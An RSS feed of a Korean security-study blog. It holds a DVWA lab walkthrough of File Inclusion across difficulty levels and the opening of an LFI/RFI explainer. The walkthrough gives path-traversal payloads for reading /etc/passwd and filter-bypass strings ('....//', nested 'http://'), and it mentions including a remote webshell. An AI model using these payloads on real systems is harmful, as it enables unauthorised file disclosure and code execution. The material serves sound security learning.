<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>제나나's 블로그</title>
    <link>https://jennana.tistory.com/</link>
    <description>IT/보안에 대해 공부한 내용을 올리는 블로그입니다.</description>
    <language>ko</language>
    <pubDate>Sun, 5 Apr 2026 17:21:52 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>제나나</managingEditor>
    <image>
      <title>제나나's 블로그</title>
      <url>https://tistory1.daumcdn.net/tistory/3146210/attach/d4e1224c24e34930a5585354a4b15320</url>
      <link>https://jennana.tistory.com</link>
    </image>
    <item>
      <title>[DVWA 실습] File Inclusion</title>
      <link>https://jennana.tistory.com/661</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;[DVWA&amp;nbsp;실습]&amp;nbsp;File&amp;nbsp;Inclusion&lt;/b&gt;&lt;/h2&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;✔ 공격대상 :&amp;nbsp;&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;376&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/DY5J2/btsLS7ZseDw/3dFIUoOPNEkQPKj7opcwjk/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/DY5J2/btsLS7ZseDw/3dFIUoOPNEkQPKj7opcwjk/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/DY5J2/btsLS7ZseDw/3dFIUoOPNEkQPKj7opcwjk/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FDY5J2%2FbtsLS7ZseDw%2F3dFIUoOPNEkQPKj7opcwjk%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;376&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;376&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;`file1.php`링크를 누르면 아래와 같은 결과가 나온다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;347&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/VvCON/btsLTuNyCc1/vZNsTnkO852OsQJNg2U9qK/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/VvCON/btsLTuNyCc1/vZNsTnkO852OsQJNg2U9qK/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/VvCON/btsLTuNyCc1/vZNsTnkO852OsQJNg2U9qK/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FVvCON%2FbtsLTuNyCc1%2FvZNsTnkO852OsQJNg2U9qK%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;347&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;347&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;`localhost/dvwa/vunlerabilities/fi/?page=file1.php`에서 `page=file1.php` 부분을 `page=file4.php`로 입력하면, File Inclusion 공격이 잘 진행되는지 알 수 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;668&quot; data-origin-height=&quot;148&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/GayCL/btsLSgbXVsQ/Xl3wIqwMx5mrET7t3Mr7Vk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/GayCL/btsLSgbXVsQ/Xl3wIqwMx5mrET7t3Mr7Vk/img.png&quot; data-alt=&quot;page=file4.php를 입력&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/GayCL/btsLSgbXVsQ/Xl3wIqwMx5mrET7t3Mr7Vk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FGayCL%2FbtsLSgbXVsQ%2FXl3wIqwMx5mrET7t3Mr7Vk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;668&quot; height=&quot;148&quot; data-origin-width=&quot;668&quot; data-origin-height=&quot;148&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;page=file4.php를 입력&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;page 파라미터를 조작해서 원하는 파일을 실행시키는 공격을 진행하면 된다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;h3 style=&quot;text-align: left;&quot; data-ke-size=&quot;size23&quot;&gt;  1. Low Level&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  LFI 공격&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;page 파라미터값에 `page=../../../../../../etc/passwd`을 입력하여 서버의 `/etc/passwd`파일을 읽도록한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;458&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b6fyRM/btsLTIZbjzk/ONnxJbnjKJh5ekty3gJbV0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b6fyRM/btsLTIZbjzk/ONnxJbnjKJh5ekty3gJbV0/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b6fyRM/btsLTIZbjzk/ONnxJbnjKJh5ekty3gJbV0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb6fyRM%2FbtsLTIZbjzk%2FONnxJbnjKJh5ekty3gJbV0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;458&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;458&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  RFI 공격&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;page 파라미터값에 `page=http://naver.com`을 입력하면 외부의 링크 실행시킬 수 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;335&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/PA6RB/btsLVxrqSSW/451UkgdSnSVK1EdDirNCdK/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/PA6RB/btsLVxrqSSW/451UkgdSnSVK1EdDirNCdK/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/PA6RB/btsLVxrqSSW/451UkgdSnSVK1EdDirNCdK/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FPA6RB%2FbtsLVxrqSSW%2F451UkgdSnSVK1EdDirNCdK%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;335&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;335&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;네이버 주소 말고 웹셸 주소(예:` http://www.webshell.com/r57.php`)를 입력하면 공격자가 미리 외부에 업로드해 놓은 webshell을 실행시킬 수 있다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 style=&quot;text-align: left;&quot; data-ke-size=&quot;size23&quot;&gt;  2. Medium Level&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Low Level에서 실행되었던, `page=../../../../../../etc/passwd`와 `page=http://www.naver.com` 둘 다 실행이 되지 않는다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;306&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bK3ZbJ/btsLUVsIzpY/nIxDbTpdRxS53AkoddND11/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bK3ZbJ/btsLUVsIzpY/nIxDbTpdRxS53AkoddND11/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bK3ZbJ/btsLUVsIzpY/nIxDbTpdRxS53AkoddND11/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbK3ZbJ%2FbtsLUVsIzpY%2FnIxDbTpdRxS53AkoddND11%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;306&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;306&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;292&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdo5i9/btsLVyKAQbZ/PnufCjJotUcsf2veyTmbm1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdo5i9/btsLVyKAQbZ/PnufCjJotUcsf2veyTmbm1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdo5i9/btsLVyKAQbZ/PnufCjJotUcsf2veyTmbm1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbdo5i9%2FbtsLVyKAQbZ%2FPnufCjJotUcsf2veyTmbm1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;292&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;292&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 소스코드 확인하기&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;536&quot; data-origin-height=&quot;231&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bxizyF/btsLXo7xXwp/CJzjy55cIhhGdp2ZRGOLA1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bxizyF/btsLXo7xXwp/CJzjy55cIhhGdp2ZRGOLA1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bxizyF/btsLXo7xXwp/CJzjy55cIhhGdp2ZRGOLA1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbxizyF%2FbtsLXo7xXwp%2FCJzjy55cIhhGdp2ZRGOLA1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;536&quot; height=&quot;231&quot; data-origin-width=&quot;536&quot; data-origin-height=&quot;231&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  소스코드를 확인해 보면 `http://`, `https://`, `../`, `..\`가 입력되면 &quot;&quot;(공백)으로 대체된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;필터링되지 않는 문자열을 찾아야 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  LFI 공격&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;`../`는 공백으로 치환되므로, `../`를 `../`사이에 넣으면 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그러면 `....//`가 되는데, `....//`에서 `../`만 공백으로 대체되기 때문에, `../`이 남게 된다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;422&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/IzVyu/btsLUXKTo08/lSIA4kJue79lPSEKkkAB9k/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/IzVyu/btsLUXKTo08/lSIA4kJue79lPSEKkkAB9k/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/IzVyu/btsLUXKTo08/lSIA4kJue79lPSEKkkAB9k/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FIzVyu%2FbtsLUXKTo08%2FlSIA4kJue79lPSEKkkAB9k%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;422&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;422&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  `....//....//....//....//....//....//etc/passwd`를 넣게된면, `../`이 공백으로 치환되면서 `../../../../../../etc/passwd`가 남게 되면서 공격에 성공하게 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  RFI 공격&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;위의 LFI공격과 마찬가지로 필터링되는 문자열을 겹쳐서 넣으면 된다. (`http://` 를 공백으로 치환하니까, `http://` 사이에 `http://`를 넣어 주면 된다)&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;309&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/NHp7G/btsLVzpfY32/5Fs5XtJGFj5O9odxVyjKr0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/NHp7G/btsLVzpfY32/5Fs5XtJGFj5O9odxVyjKr0/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/NHp7G/btsLVzpfY32/5Fs5XtJGFj5O9odxVyjKr0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNHp7G%2FbtsLVzpfY32%2F5Fs5XtJGFj5O9odxVyjKr0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;309&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;309&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  `hhttp://ttp://http://www.naver.com`을&amp;nbsp;넣어준다면,&amp;nbsp;`http://www.naver.com`으로 치환되면서 공격에 성공하게 된다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 style=&quot;text-align: left;&quot; data-ke-size=&quot;size23&quot;&gt;  3. High Level&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;High level에서는, low와 medium의 공격 방식이 통하지 않는다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 소스코드 확인&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;505&quot; data-origin-height=&quot;267&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/xa0ud/btsLV6NAZTy/UjzFAjNhS4CjxEjRmJSH40/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/xa0ud/btsLV6NAZTy/UjzFAjNhS4CjxEjRmJSH40/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/xa0ud/btsLV6NAZTy/UjzFAjNhS4CjxEjRmJSH40/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fxa0ud%2FbtsLV6NAZTy%2FUjzFAjNhS4CjxEjRmJSH40%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;505&quot; height=&quot;267&quot; data-origin-width=&quot;505&quot; data-origin-height=&quot;267&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  소스코드를 확인해 보면, 'page'인자값인 `$file`값이 `file*` 패턴에 맞지 않고, `include.php`와도 일치하지 않으면 에러 메시지를 출력하고 종료한다. 즉, `file`로 시작하고 `include.php`가 포함되어 있어야만 실행되는 것을 확인할 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  그렇기 때문에 `http://`로 시작하는 외부 URL을 삽입하는 `RFI 공격`은 실행되지 않는다는 것을 알 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  LFI 공격&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;728&quot; data-origin-height=&quot;484&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cqHy9l/btsLUTuUsLo/P2f2k7whqSFYzdFDmlYMpk/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cqHy9l/btsLUTuUsLo/P2f2k7whqSFYzdFDmlYMpk/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cqHy9l/btsLUTuUsLo/P2f2k7whqSFYzdFDmlYMpk/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcqHy9l%2FbtsLUTuUsLo%2FP2f2k7whqSFYzdFDmlYMpk%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;728&quot; height=&quot;484&quot; data-origin-width=&quot;728&quot; data-origin-height=&quot;484&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  `file:///`로 로컬 파일을 불러올 수 있다. 인자값으로 `file:///../../../../../etc/passwd`를 입력하면 파일이 불러와진다. 공격 성공!&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  RFI&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  필터링으로 공격 불가&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 style=&quot;text-align: left;&quot; data-ke-size=&quot;size23&quot;&gt;  4. Impossible Level&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;✔ 소스코드 확인&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;250&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dFdgI8/btsLWAOr67w/mIDrBbJs8Zia4eyztDOClk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dFdgI8/btsLWAOr67w/mIDrBbJs8Zia4eyztDOClk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dFdgI8/btsLWAOr67w/mIDrBbJs8Zia4eyztDOClk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdFdgI8%2FbtsLWAOr67w%2FmIDrBbJs8Zia4eyztDOClk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;250&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;250&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  소스코드를 확인해 보면, `page` 인자값으로 정확한 파일명을 입력하지 않으면 실행되지 않아서 공격이 불가능하다는 것을 알 수 있다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>웹 보안/DVWA 실습</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/661</guid>
      <comments>https://jennana.tistory.com/661#entry661comment</comments>
      <pubDate>Wed, 22 Jan 2025 18:30:15 +0900</pubDate>
    </item>
    <item>
      <title>[웹 해킹] File Inclusion 공격</title>
      <link>https://jennana.tistory.com/660</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;[웹&amp;nbsp;해킹]&amp;nbsp;File&amp;nbsp;Inclusion&amp;nbsp;공격&lt;/b&gt;&lt;/h2&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;1. 개요&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;File Inclusion은 웹 애플리케이션에서 &lt;span style=&quot;text-align: start;&quot;&gt;사용자가 &lt;/span&gt;제공한 입력 값을 통해 서버에 있는 파일을 액세스 하거나 실행하도록 만드는 공격 기법이다. 일반적으로 대상 애프리케이션에 구현된 `동적 파일 인클루전` 메커니즘을 악용한다. 이 취약점은 적절한 검증 없이 사용자가 제공한 입력을 사용하기 때문에 발생한다.&amp;nbsp;이 공격은 `Local File Inclusion(LFI)`와 `Remote File Inclusion(RFI)`의 두가지 주요 유형으로 나뉜다. `LFI`는 서버 내(로컬) 파일에 접근하는 공격이고, `RFI`는 외부에 있는 파일을 원격으로 include하는 공격이다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;2000&quot; data-origin-height=&quot;551&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/KC4fL/btsLSyJYDWN/8IEz7kvJMXmDEkPbQxhgM0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/KC4fL/btsLSyJYDWN/8IEz7kvJMXmDEkPbQxhgM0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/KC4fL/btsLSyJYDWN/8IEz7kvJMXmDEkPbQxhgM0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FKC4fL%2FbtsLSyJYDWN%2F8IEz7kvJMXmDEkPbQxhgM0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2000&quot; height=&quot;551&quot; data-origin-width=&quot;2000&quot; data-origin-height=&quot;551&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2021 OWASP TOP 10 중에서는 `Broken Access Control`과 `Vulnerable and Outdated Components`에 해당된다.&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;`Broken Access Control` 항목은 사용자 입력을 적절히 검증하지 않아서 사용자가 허용되지 않은 파일이나 디렉토리에 접근할 수 있는 경우이다. `file inclusion` 공격은 경로탐색(`../`)이나 입력값 변조를 통해 파일에 직접 접근하여 민감한 데이터에 접근이 가능해진다.&lt;br /&gt;`Vulnerable and Outdated Componets` 항목은 서버에서 사용 중인 컴포넌트(프레임워크, 라이브러리 등)가 취약하거나 오래된 경우 발생한다. `file inclusion` 공격의 경우 오래된 PHP 설정에서 `allow_url_include`가 활성화 되어 있으면 RFI 공격이 가능하다.&amp;nbsp;&lt;/blockquote&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;2. LFI (Local File Inclusion)&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자가 애플리케이션 서버에서 로컬 파일을 읽거나 실행하도록 강제하는 공격이다.&lt;/p&gt;
